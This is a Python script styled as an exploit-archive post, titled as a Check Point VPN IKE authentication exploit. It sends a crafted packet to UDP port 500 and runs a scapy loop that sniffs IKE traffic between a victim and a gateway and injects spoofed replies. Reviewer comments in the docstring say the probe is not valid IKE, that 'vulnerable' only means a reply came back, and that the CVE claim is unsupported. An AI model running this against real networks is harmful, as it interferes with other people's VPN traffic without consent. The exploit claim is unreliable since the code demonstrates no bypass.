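#!/usr/bin/env python3
# ============================================================================
# | # Title : Check Point VPN IKE Legacy Auth Exploit                        |
# | # Author : indoushka                                                     |
# | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
# | # Vendor : No standalone download available                              |
# ============================================================================
# [+] Summary : A Python script attempting to exploit a vulnerability in
#     Check Point VPN (CVE-2026-50751) by sending a malformed IKE_SA_INIT packet
#     to UDP port 500, detecting whether the target responds as an indicator of
#     exploitability, then executing a MITM attack to intercept IKE packets
#     between a victim and a VPN gateway.
#
# NOTE(review): read the module docstring before relying on this listing - the
# code below does not demonstrate the bypass the summary describes.
#
# [+] POC :
"""IKE (UDP/500) responder probe plus a sniff-and-inject loop.

What the code actually does (and does not do):

* ``create_ike_sa_init`` builds a fixed 24-byte blob. It is NOT a well-formed
  IKE message: an RFC 7296 IKE header is 28 bytes and starts with two 8-byte
  SPIs, whereas this blob begins with ``0x20 0x20 0x00 0x00``.
* ``exploit_legacy_auth`` sends that blob and returns True if *any* UDP reply
  arrives within 3 s. An IKE responder that answers an unparseable datagram
  (typically with an error notification) therefore produces "vulnerable" on
  every reachable gateway, patched or not. Nothing here authenticates,
  bypasses authentication, or touches anything Check Point-specific, so the
  CVE identifier in the title is not substantiated by this code.
* ``mitm_attack`` only sniffs and sends spoofed replies. It performs no ARP or
  routing manipulation, so it only sees traffic the host already receives, and
  the genuine packet still reaches its real destination.

Runtime requirements visible from the imports: scapy and raw-socket privilege
(root / CAP_NET_RAW, or Npcap on Windows) for ``sr1``, ``send`` and ``sniff``.
The original listing also imported ``cryptography`` and generated an X25519
key that was never used on the wire; that dead code has been removed.
"""

import random
import struct
import sys

try:
    from scapy.all import IP, UDP, Raw, send, sniff, sr1
except ImportError as exc:  # scapy is only needed by the methods that touch the network
    _SCAPY_IMPORT_ERROR = exc
else:
    _SCAPY_IMPORT_ERROR = None

# Suffix appended to every spoofed reply. It doubles as a marker so the sniffer
# can recognise (and skip) its own injected packets instead of re-injecting them.
_INJECT_TAG = b"\x00\x00\x00\x01BAD"


class CVE202650751Exploit:
    """Probe ``target_ip:target_port`` for an IKE responder and optionally inject
    spoofed IKE replies between a victim and a gateway.

    Despite the class name, no method here exercises a Check Point-specific
    flaw; see the module docstring for what each method really does.
    """

    def __init__(self, target_ip, target_port=500):
        """Store the probe destination.

        Args:
            target_ip: host scapy will send the probe to (IP or hostname).
            target_port: UDP port of the IKE responder, 500 by default.
        """
        self.target_ip = target_ip
        self.target_port = target_port
        # Kept for interface compatibility with the original listing; it is
        # never opened because scapy performs all packet I/O.
        self.sock = None

    def create_ike_sa_init(self):
        """Return the 24-byte probe the original listing sends.

        Layout produced (big-endian throughout):
          bytes 0-3   0x20 0x20 0x00 0x00
          bytes 4-15  three uint32 values: 1, 0, 1
          bytes 16-23 0x20 0x00 0x00 0x04 0x01 0x02 0x03 0x04

        This is not a valid IKE_SA_INIT (no SPIs, no SA/KE/Nonce payloads); the
        bytes are kept identical to the original so results stay comparable.
        """
        header = struct.pack("!BBBBIII", 0x20, 0x20, 0x00, 0x00, 1, 0, 1)
        trailer = bytes([0x20, 0x00, 0x00, 0x04, 0x01, 0x02, 0x03, 0x04])
        return header + trailer

    def exploit_legacy_auth(self):
        """Send the probe once and report whether anything answered.

        Returns:
            True if any UDP reply arrived within 3 seconds, False on timeout,
            missing scapy, or a send error (e.g. insufficient privilege).

        A reply proves only that something on the port answers IKE-looking
        traffic; it is not evidence of an authentication bypass.
        """
        print(f"[*] Targeting {self.target_ip}:{self.target_port}")
        if _SCAPY_IMPORT_ERROR is not None:
            print(f"[-] scapy is required: {_SCAPY_IMPORT_ERROR}")
            return False

        # Random high source port so repeated probes are not trivially correlated.
        probe = (
            IP(dst=self.target_ip)
            / UDP(sport=random.randint(45000, 65535), dport=self.target_port)
            / Raw(load=self.create_ike_sa_init())
        )
        print("[*] Sending malicious IKE packet...")
        try:
            response = sr1(probe, timeout=3, verbose=0)
        except Exception as e:  # scapy surfaces OSError/PermissionError/Scapy_Exception here
            print(f"[-] Exploit failed: {e}")
            return False

        if response is None:
            return False
        print("[+] Received a reply on UDP/500 - an IKE responder is listening "
              "(this is NOT proof of vulnerability)")
        return True

    def mitm_attack(self, victim_ip, vpn_gateway):
        """Sniff IKE (UDP/500) traffic between ``victim_ip`` and ``vpn_gateway`` and
        answer each packet with a spoofed reply carrying the original payload
        plus ``_INJECT_TAG``.

        Caveats visible from the code: there is no ARP or routing manipulation,
        so this host must already see the traffic; the genuine packet still
        reaches its destination and the spoofed reply merely races it. Blocks
        until ``sniff`` is interrupted. Requires raw-socket privilege.
        """
        print(f"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}")
        if _SCAPY_IMPORT_ERROR is not None:
            print(f"[-] scapy is required: {_SCAPY_IMPORT_ERROR}")
            return

        def packet_handler(pkt):
            # Reply to every IKE datagram in either direction, as the original did.
            if IP not in pkt or UDP not in pkt:
                return
            udp = pkt[UDP]
            if udp.dport != 500 and udp.sport != 500:
                return
            if Raw not in pkt:
                # Header-only datagram; indexing pkt[Raw] here raised in the original.
                return
            load = pkt[Raw].load
            if load.endswith(_INJECT_TAG):
                # Our own spoofed reply captured on the way out: both endpoints
                # match the BPF filter, so without this check every injection
                # would trigger another injection.
                return

            print(f"[+] Intercepted IKE packet from {pkt[IP].src}")
            spoofed = (
                IP(src=pkt[IP].dst, dst=pkt[IP].src)
                / UDP(sport=udp.dport, dport=udp.sport)
                / Raw(load=load + _INJECT_TAG)
            )
            send(spoofed, verbose=0)

        sniff(
            filter=f"host {victim_ip} and host {vpn_gateway} and port 500",
            prn=packet_handler,
            store=0,
        )


def main():
    """CLI entry point: probe argv[1]; if argv[2] is given, also run the
    sniff/inject loop between argv[2] (victim) and argv[1] (gateway)."""
    if len(sys.argv) < 2:
        # The original usage line named only [victim_ip], but argv[1] is the target.
        print(f"Usage: {sys.argv[0]} <target_ip> [victim_ip]")
        sys.exit(1)

    exploit = CVE202650751Exploit(sys.argv[1])
    if not exploit.exploit_legacy_auth():
        print("\n[+] No reply on UDP/500 (unreachable, filtered, or not running IKE) "
              "- this does not show the target is patched")
        return

    print("\n[!] IKE responder detected - the original listing reported this as "
          "'VULNERABLE', but a reply alone demonstrates no authentication bypass")
    if len(sys.argv) == 3:
        print(f"[*] Initiating MITM attack against {sys.argv[2]}")
        exploit.mitm_attack(sys.argv[2], sys.argv[1])


if __name__ == "__main__":
    main()

# Greetings to :==============================================================
# jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
# ============================================================================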